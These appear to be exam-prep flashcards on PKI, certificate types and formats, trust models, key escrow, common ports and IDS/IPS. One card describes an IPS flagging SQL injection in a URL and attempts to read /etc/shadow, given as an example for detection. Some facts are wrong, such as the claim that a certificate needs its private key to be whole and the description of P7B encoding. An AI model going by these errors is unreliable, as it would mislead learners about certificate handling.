PKI Public Key Infrastructure (PKI) is: the Entire Framework / System of Technologies used to Request, Create, Manage, Store, Distribute and Revoke Digital Certificates & manage Public-key Encryption. It is based on Asymmetric Encryption. The purpose of a PKI is to facilitate and establish a Secure Communication session between 2 entities, for the electronic transfer of information & for a range of network activities such as e-commerce, internet banking and confidential email. PKI and Public Key Encryption are related but they are NOT the same thing! PKI is the Entire System and just uses Public Key cryptography to Function
RA Registration Authority (RA) is an Authority in a Network that goes through the process of Identifying, Verifying and Authenticating who the Requestor/ User is, there request and ultimately decides if the Certificate should be Signed (Approved) or REVOKED. RA's approve or Revoke Digital certificates and ultimately determines whether the Certificate Authority (CA) should Issue it or Revoke the Certificate. - Manages Renewals and Re-Key Requests and Maintains Certifications. - The RA is the Foundation of Trust in this Model
PKI Overview To understand how PKI works, it’s important to go back to the basics that govern encryption in the first place. With that in mind, let’s dive into cryptographic algorithms and digital certificates. The Building Blocks of Public Key Cryptography: 1. Symmetric Encryption 2. Asymmetric Encryption - (creates 2 Cryptokeys - a Public and Private key. Solves exchange problem that plagued Symmetric Encryption). 3. The Role of Digital Certificates in PKI 4. How the Certificate Creation Process Works 5. The CA Hierarchies 6. How Root CA's create Layers of Trust
CRL Certificate Revocation List (CRL) is an Online list of Digital Certificates that the CA (Certificate Authority) has REVOKED. The list of Certificates are Revoked because those Certificates have become Compromised. The Certificate Revocation List (CRL) is a FULL List of EVERY Certificate that has EVERY BEEN REVOKED by that CA. CAs are required to publish CRLs, but it’s up to certificate consumers if they check these lists and how they respond if a certificate has been revoked.
CN Common Name (CN) the FQDN (Fully Qualified Domain Name) associated with a Certificate. Originally, SSL certificates only allowed the designation of a Single host name in the certificate subject called Common Name (CN) This is an important Attribute in a Certificate. If the Common Name does NOT Match the Domain name you would get an Error in your web browser. (Normal Certificate Example Below) Ex: If you’re connecting to a site and the CN in the certificate doesn’t match the name that you put into your browser or address bar, you'll get a saying your connection is NOT private, - badssl.com (website that lists bad certificates) and there are a number of different error messages so that you can get an idea of what you can expect to see in your browser if any of these errors were to occur.
OCSP Online Certificate Status Protocol (OCSP): A protocol (built-into the browser) that allows you to determine the Revocation Status of a Digital Certificate using its Serial Number. It is much faster than CRL. The OCSP message is sent to the OCSP responder Also considered one of 2 common schemes used to maintain the security of a server and other network resources. An older method, which OCSP has superseded in some scenarios, is known as a certificate revocation list (CRL).
All of a CA’s certificates must be revoked if it is compromised
CSR Certificate signing request (CSR) -- the process of sending a Request to the Registration Authority (RA) informing them that you need a New Certificate.
SAN A Subject Alternative Name (SAN) allows users to specify Additional Host names for a Single (1) SSL certificate. Each of these names will be considered protected by the SSL certificate. a Certificate can be used on Multiple Domain Name Servers, but belong to the same Organization, such as using www.google.com. or it's SAN: google.com. You can also insert other information into a SAN certificate, such as an IP address. It other words, a SAN, specifies the Additional Host Names / FQDN's that can be used for a Single SSL Certificate. Other Notes: SAN is becoming the Standard practice for SSL Certificates and will soon replace Common Names (CN's) Ex: (In this example we're looking at the learn.microsoft.com website Note: The Field Value of this certificate and it's listed SAN's that it is valid on.)
Expiration The Date a Certificate will Expire OR is No Longer Valid. Recall, Certificates are Valid for a Limited Time Period, from the Date of Issuance, as specified on the Certificate. Note: Current Industry Guidelines on Maximum Certificate Liftetime from widely Trusted CA's is about 1 year or less.
What is the Main Goal of a CA? The main goal of a Certificate Authority (CA) is to verify the Authenticity and Trustworthiness of a Website, Domain and Organization so users know exactly who they're communicating with online and whether that entity can be trusted with their data. When a CA issues a digital certificate for a website, users know they are connected with an official website, not a fake or spoofed website created by a hacker to steal their information or money.
What are the Key Roles of a CA? The Key roles of a Certificate authority (CA) As an integral part of PKI, a CA plays multiple crucial roles:issues Digital certificates;helps establish Trust between Communicating entities over the internet;Verifies Domain Names and Organizations to validate their identities; andmaintains Certificate Revocation List (CRL) Every CA also charges a small fee to complete the verification process and issue a digital certificate following the process explained below
Root Certificate "The First Certificate created by the CA (Certificate Authority) that Identifies it. Since a Certificate Authority (CA) can issue multiple certificates in the form of a tree structure, A Root Certificate is the Top-Most Certificate of the Tree, the private key which is used to ""sign"" other certificates. - A Root SSL certificate is a certificate issued by a Trusted Certificate authority (CA)."
A Root SSL Certificate is a certificate issued by a Trusted Certificate authority (CA). True:: T/F
"A Certificate Authority (CA) can issue multiple certificates in the form of a tree structure. A Root Certificate is the Top-Most Certificate of the Tree, the private key which is used to ""sign"" other certificates. True:: T/F"
Certificate A Digitally-signed Electronic Document that binds a Public Key with a Users's Identity. These certificates commonly use a X.509 standard used for Digital Certificates & PKI
What are the Limitations of a CN compared to a SAN? a Common Name (CN) only allows the designation of a Single host name in the certificate subject called Common Name (CN). If the Common Name does NOT Match the Domain name you would get an Error in your web browser. It's limitations of CN is that you can only have 1 Host name in the Certificate (ex: www.google.com), where as a SAN allows users to specify Multiple Host names for a Single (1) SSL certificate. Each of these names will be considered protected by the SSL certificate. This is why SAN is becoming the Standard practice for SSL Certificates and will soon replace Common Names (CN's)
What Certificate error is this an example of? Common Name (CN)
What is the Purpose of PKI ? PKI governs the issuance of Digital Certificates to Protect sensitive data, Provide unique digital identities for users, devices and applications and Secure end-to-end communications.
Certificate Attributes "the attributes that comprise the parts of a Certificate 1. OIDS - Object Identifiers (OIDS) are essentially the Serial numbers, like that on a bank note. OID's are a sequence of numbers found on the ""General Tab"". A certificate is identified by its OID. CA's use OID's to identify a Certificate 2. Issuer -- Identifies the CA that issues the ticket. 3. Validity Dates (expiration) -- certificates contain the ""valid to and valid from"" dates which assures the certificate will expire at some point. 4. Subject -- identifies the OWNER of the Certificate. 5. Public Key -- RSA Asymmetric Encryption uses the Public Key with the matching Private Key."
"OIDS - Object Identifiers (OIDS) are essentially the Serial numbers in the Certificate, similar to that on a bank note. OID's are a sequence of numbers found on the ""Details Tab"" of a certificate."
A certificate is identified by its OID. CA's use OID's to identify a Certificate. True:: T / F
Where are OID's located at in the Certificate Tab?
Wildcard Certificate Begins with an Asterik (*) and can be used for Multiple Domains, but each Domain Name must have the same ROOT Domain. Basically, this certificate Allows ALL of the Subdomains to use the Same Public Key Certificate and have it displayed as Valid. Ex: Google uses a Wildcard Certificate to issue *.google.com -- the same certificate can be used for: accounts.google.com, support.google.com, etc
Subject alternative name (SAN) Certificate used for Multiple domains that use Different names but A Subject Alternative Name (SAN) allows users to specify Additional Host names for a Single (1) SSL certificate. Each of these names will be considered protected by the SSL certificate. a Certificate can be used on Multiple Domain Name Servers, but belong to the same Organization, such as using www.google.com. or it's SAN: google.com. You can also insert other information into a SAN certificate, such as an IP address. It other words, a SAN, specifies the Additional Host Names / FQDN's that can be used for a Single SSL Certificate. Other Notes: SAN is becoming the Standard practice for SSL Certificates and will soon replace Common Names (CN's) Ex: (In this example we're looking at the www.google.com website Note: The Field Value of this certificate and it's listed SAN's that it is valid on.)
Code Signing Certificate the process of Authenticating Software Code / Applications / Programs/ Scripts to confirm there Source of Origin, such as the Author / Publisher using a Certificate or Cryptographic Keys. This Certificate verifies: - Software /Code Author Validation. - Authentication of Code - Provides Cryptographic Protection Windows, Linux, and MacOS will alert you if you download a Software that is not Code Signed or from an Unknown Publisher.
Self-Signed Certificate a self-signed certifcate is issued by the Same Entity that is using it. -It is NOT issued by a Trusted CA. - Instead Private CA's within an Organization generate these Self-signed tickets. By Default They're NOT Trusted. However, Administrators can use the Copies of the Private CA's Self-signed certificates to place them in Trusted Root CA Folder for Corporate Computers. -However, it does NOT have a CRL and cannot be Validated or Trusted.
Machine / Computer Certificate a Certificate issued to a Device or a Computer, it is used to identify a computer within a domain
Email Certificate The 2 uses of e-mail certificates are for: 1. Encryption of Email 2. Digital Signatures
User Certificates used to represent a user's Digital Identity. In most cases , a User Certificate can be Mapped back to a User Account. a user certificate provides Authentictiy to a user for the Applications that they use.
Root Certificate (review) A Root Certificate is a Trust Anchor in a PKI environment from which the whole chain of Trust is derived; This is the main certificate of the Root CA, found at the top of the Heirarchy.
DV a Domain Validation Certificate is a X.509 certificate that proves the Ownership of a DNS Domain Name.
Extended Validation (EV) provides a Higher level of Trust in Identifying the Entity that is using the Certificate. Normally seen in the Financial Sector's Websites. Note: EV certificates can be issued only by a subset (CAs) and require verification of the requesting entity's legal identity before certificate issuance. (the green padlock and Entity's company name listed are the Extended Validation in this certificate)
Certificates consists of how many Keys? 2 Keys: a Public & Private key. Without one, you don't have a valid certificate. Certificates are NOT Whole without the Private Key.
Certificate Format Overview here
.X690 uses BER, CER, and DER for Encoding True:: T/F
BER Basic Encoding Rules (BER) -- the Original Ruleset governing the Encoding of Data Structures for Certificates where several different Encoding Types can be Utilized.
CER Canonical Encoding Rule -- the Restricted Version of BER that only Allows the use of 1 Encoding Type. Can use Both: DER BINARY Format OR ASCII Format Certificate. Extensions can include: .CER, .CRT
DER Distinguished Encoding Rules (DER) is another Restricted Version of the BER which allows only 1 Encoding Type & has MORE Restrictive Rules for Length, Character Strings, & how Elements of a Digital Certificate are Stored in X.509. It's Format is Designed to Transfer syntax for Data Structures. Considered a Common Format and is even used with JAVA Certificates. DER is a BINARY FILE Certificate Extensions may be saved as .DER, CER, .CRT (DER is on the Test)
PEM Privacy enhanced mail (PEM) -- a Filetype used for Digital Certificates for Privacy enhanced mail -- uses the DER encoding Method. Uses ASCII file format. May also store itself as a these extension: .pem, .cer, .crt, or .key file
P12 "Public Key Cryptographic System # 12 (aka PKCS#12 Certificate) used to store Server Certificate, Intermediate Certificate & A Private Key in one Encrypted file. filetype is stored as .p12 file - used as a Container Format to hold many Certificates. May store many .X509 certificates in a single .p12 or .pfx file. - May be used to transfer a Public or Private Key PAIR. - Can be Password Protected. - Derived from the Extended Microsoft's Personal Information Exchange (PFX) format Both PFX and .p12 files are 2 very similar formats that are both referenced interchangably."
PFX Personal Information Exchange (PFX) -- used by Microsoft for release signing. Precursor to the P12 format. (essentially, the OLDER VERSION of P12) This file will contain BOTH the Private & Public keys. Filetype: .pfx.
P7B "Public Key Cryptographic System # 7 (aka PKCS#7) used for the Basis of SMIME -- the Secure Protocol and SSO (Single Sign On). are DER Based (ASCII) uses .p7b. ASCII format used to share Public Keys"
On the Test, a good tip is to Remember that all of these Filetypes are Associated with PKI in General True:: T/F
Certificate are usually stored as Binary Files or ASCII files aka Encoded Files. True:: T/F
95e0139725f7449a981da507bcf18ba5-ao-1
95e0139725f7449a981da507bcf18ba5-ao-2
6171852f151d4dd19f6186e9433d4ca8-ao-1
6171852f151d4dd19f6186e9433d4ca8-ao-2
e0e3bcb2b5ab488ea38ddd4d9181d3b4-ao-1
e0e3bcb2b5ab488ea38ddd4d9181d3b4-ao-2
1f36ec73c8e4425893ad791a7eb0ccd8-ao-1
1f36ec73c8e4425893ad791a7eb0ccd8-ao-2
3b7f5c5ad90b402eb1fa9980628e70c3-ao-1
3b7f5c5ad90b402eb1fa9980628e70c3-ao-2
4ad39a8719984878afa7eeeeccf75d0d-ao-1
4ad39a8719984878afa7eeeeccf75d0d-ao-2
X.509 Certificates are the STANDARD used for Digital Certificates. True:: T/F IT Allows us to move these certifications between different systems.
Online vs. offline CA: An Online CA (Certificate Authority) is ALWAYS Running / operating (meaning the computer is on). An Offline CA is Kept Offline except for Specific Renewal & Issuance operations. Offline CA is considered Best Practice.
Offline CA is NOT considered Best Practice False::T/F Offline CA IS Best Practice. -- CA's run on Computer Servers. The Safest Computer servers is a computer that is turned off and disconnected from the Internet
X.509:: What Certificate Format? is the Standard used for PKI for digital certificates and contains the owner/user’s information and the certificate authority’s information.
Stapling is a method used when the Web Server bypasses the CRL and instead uses OCSP (Online Certificate Status Protocol) which allows the Web Server to provide the Validity of it's OWN Certificate. This is performed by the Web Server, which essentially Downloads the OCSP from the Certificate Vendor in Advance and Provding it to Browsers w/out going back to the OCSP endpoint. aka OCSP Stapling.
Certificate Validity can only be done by the CRL or OCSP.
OCSP Stapling uses OCSP (Online Certificate Status Protocol) which allows the Web Server to provide the Validity of it's OWN Certificate.
Pinning is a method designed to mitigate & prevent the use of FRAUDULENT X509 Certificates, Compromised CA's, and & Man-in-the-middle attacks Once a Public Key or Certificate has been seen for a Specific Host, that Key or Certificate is Pinned TO the Host. aka Certificate Pinning
Certificate Pinning prevents the compromising of CA's, Certificate Fraud, & SSL Man-in-the-middle attacks.
The 4 Types of Trust Models are Bridge, Hierarchical, Hybrid and Mesh.
a Trust Model is a model of how different Certificate Authorities Trust Each Other and how their clients will Trust Certificates from OTHER Certification Authorities (CA's)
Key Escrow holds the Private Keys for 3rd parties and stores them into the Hardware Security Module (HSM). addresses the possibility that a Cryptographic Key may be lost. Concern is usually with Private or Assymetic Keys. If this occurs, there is NO way to get the key back and the user can NOT Decrypt messages. So, In order to protect against this scenario, Organizations establish KEY ESCROWS to establish Recovery of LOST KEYS. Key Escrows hold the private keys stored into the HSM
addresses the possibility that a Cryptographic Key becoming lost. Concern is usually with Private or Assymetic Keys. If this occurs, there is NO way to get the key back and the user can NOT Decrypt messages. So, In order to protect against this scenario occurring, Organizations establish KEY ESCROWS to establish Recovery of LOST KEYS. Key Escrows hold the private keys and store them into the HSM
Certificate Chaining refers to the fact that Certificates are handled by a CHAIN / WEB of Trust. Example: You purchase a Digital Certificate from a CA Authority, so you Trust that CA's Certicate and in turn, that CA Trusts a ROOT Certificate.
HSM (Hardware Security Model) is a piece of Hardware or Portable Device attached to the server to Store Keys.
If a user can NOT access their Data because their Private Key is corrupted, a DRA (Data Recovery Agent) will recover the Data. The DRA needs to get the Private key from the Key Escrow.
a method of storing important cryptographic keys. Each key is stored in a system that is tied to the original user and subsequently encrypted for security purposes. Key Escrow
a hardened, tamper-resistant hardware devices that strengthen encryption practices by generating keys, encrypting and decrypting data, and creating and verifying digital signatures is called a Hardware Security Module (HSM)
An ordered list of certificates, containing an SSL/TLS Certificate and Certificate Authority (CA) Certificates, that enable the receiver to verify that the sender and all CA's are trustworthy. The chain / path begins with the SSL/TLS certificate, and each certificate in the chain is signed by the entity identified by the next certificate in the chain. This is called the Certificate Chain
What is this an example of? Certificate Chain -- Illustration of a certification path from the Certificate Owner to the Root CA, where the chain of trust begins
made up of a list of certificates that start from a server’s certificate and terminate with the root certificate. If your server’s certificate is to be trusted, its signature has to be traceable back to its root CA. In the certificate chain, every certificate is signed by the entity that is identified by the next certified along the chain. This is known as a Certificate chain (or Chain of Trust)
Links in the Certificate Chain 1. Root CA Root CAs (called “trust anchors” in X.509 terminology) hold the highest position in the trust tree and are recognized by all clients (browser/OS) at all levels. Root CAs are responsible for identifying intermediate CAs and verifying their trustworthiness. The root CA uses its certificate’s private key to sign the certificates of the intermediate CAs (or, in the case of unchained certificates, the server certificate) under it. The trustworthiness of the root CA is thus “passed down” to the intermediate CAs; any CA that is validated by the root CA is automatically trusted by its clients. 2. Intermediate CA The intermediate CA aka Subordinate is the “middle-man” between the root and server certificates. The intermediate CA certificates are either signed by the root CA, or by another intermediate CA certificate signed by a root CA. The intermediate certificate, in turn, signs the server certificate. There is often one, or more, intermediate CA certificate in a chain. For the server certificate to be compatible with all its clients, the intermediate certificate has to be installed on the server. If not, it might prevent some browsers, mobile devices, applications, etc. from trusting the server certificate. 3. Server Certificate This is the certificate that’s publicly issued server to specific domains that the user needs authorization for. The server certificates are signed by the intermediate CA, and can be traced back to the root CA. When the Chain of Trust is verified, the client makes a secure connection with the server.
is collection of rules that informs application on how to decide the legitimacy of a Digital Certificate. Trust Models
Web of Trust Model is a term used in cryptography to describe decentralized security models in which participants authenticate the identities of other users. Web of trust is a concept used in PGP, GnuPG, and other OpenPGP-compatible systems to establish the authenticity of the binding between a public key and its owner [3]. Its decentralized trust model is an alternative to the centralized trust model of a public key infrastructure (PKI), which relies exclusively on a certificate authority (or a hierarchy model of such). In this type of system each user creates and signs certificates for the people he or she knows. Therefore, no central infrastructure needs to be developed. The web-of-trust model differs greatly from the hierarchical model. The hierarchical model is easily represented with computers as an inverted tree, but the web-of-trust more closely relates to how people determine trust in their own lives. The system allows users to specify how much trust to place in a signature by indicating how many independent signatures must be placed on a certificate for it to be considered valid
Which Trust Model does this Represent? Hierarchical Model -- uses a Hierarchy from the Root CA down to the Intermediary to End User. This is the Normal PKI model.
What Trust Model does this Represent? Hierarchical Model
What is a Bridge Trust Model? "Considered a type of Trust Model. defined as a Peer-to-Peer Relationship that exists between the Root CA's. Each of the Root CA's Can Communicate with each other, allowing Cross Certification. It is possible to have a Single CA, aka ""The Bridge CA"", be the Central Point of Trust. This allows a Certification Process to be Estabilshed between Organizations or Departments. Each of the Intermediate CA's Trusts only the CA's Above & Below it, but the CA structure can now be expanded without creating Additional Layers of CA's."
4e289b4336314af38c637b769e5a3b4b-ao-1
4526f51e8ccd40c6844035ceec8322fe-ao-1
What Type of Trust Model is this? Bridge Trust Model
(DNS) ? What Port does it use? DOMAIN NAME SYSTEM (DNS) a hierarchical naming system that resolves a Hostname to an IP address. uses PORT: 53
(POP v3) Post Office Protocol (POP 3) is an Email Protocol that works by contacting your email service and downloading all of your new messages from it. Once they are downloaded onto your PC or Mac, they are deleted from the email service. This means that after the email is downloaded, it can only be accessed using the same computer. If you try to access your email from a different device, the messages that have been previously downloaded won't be available to you. Sent mail is stored locally on your PC or Mac, not on the email server. A lot of Internet Service Providers (ISPs) give you email accounts that use POP uses Port: 110 (TCP)
IMAP Internet Messaging Access Protocol (IMAP) allows you to access your email wherever you are, from any device. (this IMAP is the unsecured version of IMAP) When you read an email message using IMAP, you aren't actually downloading or storing it on your computer; instead, you're reading it from the Email Server. As a result, you can check your email from different devices, anywhere in the world. IMAP only downloads a message when you click on it, and attachments aren't automatically downloaded. This way you're able to check your messages a lot more quickly than POP. PORT: 143
Incoming Mail (IMAP) Server is written as : imap..com
Incoming (POP) Server is written as : pop..com
Outgoing Mail (SMTP) Server is written as : smtp..com
(SSL / TLS ) Protocol that Secures Data in Transit Uses Port: 443 (just like HTTPS) Note: SSL was retired in 2015. TLS is the upgraded / superior replacement
Overview of Protocols, Ports, and Use Cases
Difference between IPSec Tunnel mode vs Transport Mode The main difference in Transport mode is that it retains the original IP header. In other words, payload data transmitted within the original IP packet is protected, but not the IP header. In Transport mode, encrypted traffic is sent directly between two hosts that previously established a secure IPsec tunnel.
WAF Web Application Firewall (WAF) A specific form of an Application Firewall that Filters and Monitors HTTP traffic between the Internet and the Web Application. This is how it Protects Web Applications. typically protects Web apps from XSRF, XSS, CSRF, SQL injection, etc (some come preconfigured with OWASP rules) Ex: AWS WAF.Azure Web Application Firewall.Imperva Web Application Firewall (WAF)Azure Application Gateway. Cloudflare WAF
(IDS) Intrusion Detection System (IDS): Software or Hardware that Analyzes and Scans Whole Packets, (both the Header and the Payload), searching for known events. Once a Known-Event is Detected, it generates a Log Message. (Focuses on Alerting and Notification).
(IPS) Intrustion Prevention System (IPS) Software or Hardware that Analyzes and Scans Whole Packets, (both the Header and the Payload), searching for known events. Once a Known-Event is Detected, it REJECTS the Packet. (Focuses on Action / Rejecting).
LDAP (LDAP) Lightweight Directory Access Protocol ,(not encrypted) used forDirectory Services Information. (ex: Active Directory Domain Services ) uses Port: 389 uses: TCP & UDP
NTPsec Network Time Protocol Secure (NTPsec) used to synchronize computers TIME to Internet time Servers Default Port: 123 uses UDP
Behavior-Based (IDS & IPS) Behavior-based IPS technology will alert if a particular type of bad behavior occurs. Example, a URL with an apostrophe and SQL command would indicate a SQL injection, and someone trying to view / etc/shadow would indicate an attempt to gain access to a protected part of the file system. This is universally considered to be bad behavior, and it would be flagged by a behavior-based IPS.